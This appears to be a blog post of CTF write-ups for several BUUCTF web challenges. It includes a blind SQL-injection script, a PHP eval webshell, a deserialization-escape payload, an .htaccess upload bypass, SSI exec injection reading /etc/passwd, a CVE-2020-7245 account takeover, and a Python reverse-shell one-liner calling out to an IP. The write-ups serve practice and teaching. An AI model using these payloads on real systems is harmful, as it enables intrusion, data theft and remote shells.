BUUCTF WEB (2020-April to brush questions~)
u1s1, I really don’t know what to do recently, I don’t want to learn, and I can’t help myself out of being addicted to MC! !
[CISCN2019 Finals Day2 Web1]Easyweb
Visiting the page, I found it was a login box,,,, check the source code.
There is an image.php page and an id number. It is suspected that there is sql injection. Nothing happens
.,,, I found a robots.txt later:
download index. php.bak to no avail, download image.php.bak to get the source code of image.php:
<?php
include "config.php";
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
$id=addslashes($id);
$path=addslashes($path);
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
$result=mysqli_query($con,"select * from images where id='{
$id}' or path='{
$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
What you can see is to escape our parameters first, and then filter the single quotes, \0, etc., no wonder there was no effect before.
Take a closer look, this does not prevent us from performing sql injection.
Passing parameters:
id=\\0'&path= or 1=1#
<?php
$id = "\\0";
$path = " or 1=1 #";
$id=addslashes($id);
$path=addslashes($path);
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
echo "select * from images where id='{
$id}' or path='{
$path}'";
得到结果:
select * from images where id='\' or path=' or 1=1 #'
In this way, the where condition is useless, and we can inject and write scripts:
import requests
import sys
import string
import io
import time
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf8') #改变标准输出的默认编码,否则s.text不能输出
flag = ""
url = "http://1ecf7701-7fa0-409e-8a5a-176be2cb62a3.node3.buuoj.cn/image.php?id=\\0&path= or ascii(substr((select password from users),%s,1)) < %s"
'''
r = requests.get(url)
if "JFIF" in r.text:
print("Good!")
'''
for i in range(1,100):
for j in range(1,126):
urls = url%(str(i),str(j)) + " %23"
r = requests.get(urls)
if "JFIF" in r.text:
flag += chr(j-1)
print(flag)
break
print(flag)
Get the password:
admin login:
can't upload the php file, change another, get a link, access:
you can see that our file name is recorded in the php file!
Then we can change the file name to a php statement! ! Found that it doesn't work. It is estimated that the
php grammar can not be used after filtering the php keyword ? No, use short tags. <?=$_GET['cmd']; eval($_POST['cmd']); ?>
Chopper link:
[安洵杯2019]easy_serialize_php
Deserialization character escape, different from the previous one, this is keyword filtering, that is, less, open the title and you can see the source code
<?php
$function = @$_GET['f'];
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
if($_SESSION){
unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
Open phpinfo according to the prompt and you can see the flag file name. It should be for us to read the flag from the file.
We can see that the most important thing is the img, so we need to control this img
to see one extract($_POST);, so we can construct a new session value
$_SESSION['flagphp']=';s:3:"333";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
You can write your own code and run it to see the result:
<?php
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
$_SESSION['flagphp']=';s:3:"333";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION['img'] = base64_encode('guest_img.png');
$serialize_info = filter(serialize($_SESSION));
echo $serialize_info."\n";
$b = unserialize($serialize_info);
echo $b['img'];
结果:
a:2:{
s:7:"";s:50:";s:3:"333";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
ZDBnM19mMWFnLnBocA==
As you can see, the img we got was the one we passed in, so that's fine. Read it and find that there is still a file. Continue reading to get the flag and
finally get the payload of the flag:
get
f=show_image
post
_SESSION['flagphp']=;s:3:"333";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
[GXYCTF2019]BabyUpload
An upload interface, try to upload, find that the file with the suffix ph cannot be uploaded:
try to upload .htaccess, find that the upload is successful,
upload the picture horse, for the convenience of direct use <script language=php>:
directly readfile to read the file:
[BJDCTF2020]EasySearch
Scan and find the .swp file, visit it~, get the source code:
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
You can find that the user name can be filled in at will, as long as the first 6 digits of the password are equal 6d0bc1to the first 6 digits of the md5, you can successfully
log in. After logging in, the user name will be filled in a random shtml file~~
Search for shtml related vulnerabilities, find the ssi injection, ok
first blast Password, this one should be relatively simple:
import hashlib
def getMd5(index):
for i in range(10000,100000000):
x = i
md5 = hashlib.md5(str(x).encode("utf8")).hexdigest()
if md5[0:6] == index:
print(x)
print(md5)
return x;
getMd5("6d0bc1")
Get 2020666, perform ssi injection at the username:
直接执行服务器上的各种程序<#exec>(如CGI或其他可执行程序)
<!--#exec cmd="cat /etc/passwd"-->
After writing the command you want to execute, access the shtml file:
payload:
<!--#exec cmd="ls ../"-->
Visit flag_990c66bf85a09c664f0b6741840499b2 to get the flag:
[V&N2020 Open]HappyCTFd
This question is that when I did a CVE, my mailbox didn’t work, so I just gave up,,,, I
need the mailbox of the buu intranet,,, just as it is to reproduce the CVE, serial number: CVE-2020-7245
. Principle: CVE-2020-7245 user takeover
Open the topic, first register a user, register according to the principle admin, there is a space in front of admin,
and then go to register an email: [email protected],,,
and then log out, click on the login page Reset the password~~, enter the email:
you can change the password after you receive the email, but note that before logging in, you must first change the user name of the directly registered account.
After the password modified by admin, go directly in and find the flag:
download the file to get the flag ~~
[V&N2020 Open] CHECKIN
Open to get the source code:
from flask import Flask, request
import os
app = Flask(__name__)
flag_file = open("flag.txt", "r")
# flag = flag_file.read()
# flag_file.close()
#
# @app.route('/flag')
# def flag():
# return flag
## want flag? naive!
# You will never find the thing you want:) I think
@app.route('/shell')
def shell():
os.system("rm -f flag.txt")
exec_cmd = request.args.get('c')
os.system(exec_cmd)
return "1"
@app.route('/')
def source():
return open("app.py","r").read()
if __name__ == "__main__":
app.run(host='0.0.0.0')
You can see that we can execute commands, but before we execute the command, our flag file is deleted
and there is no response after we execute the command. Let's try the rebound shell first. Since this is python, we just use python to rebound the shell in one sentence :
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("174.0.130.25",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
After passing in, use nc to monitor on your own machine (buu's intranet machine), and successfully reach the shell, but we find that we don't have the permission to read, so
here we need to introduce a new knowledge point:
In a linux system, if a program opens a file but does not close it, even after it is deleted from the outside, there will still be the fd of this file in the fd file descriptor directory under the pid directory of the /proc process, through this we can get The content of the deleted file.
Since the flag file is opened above, but not closed, we can read the file in the fd file descriptor directory under the pid directory of the /proc process, using the command:
cat /proc/*/fd/*
Get the flag:
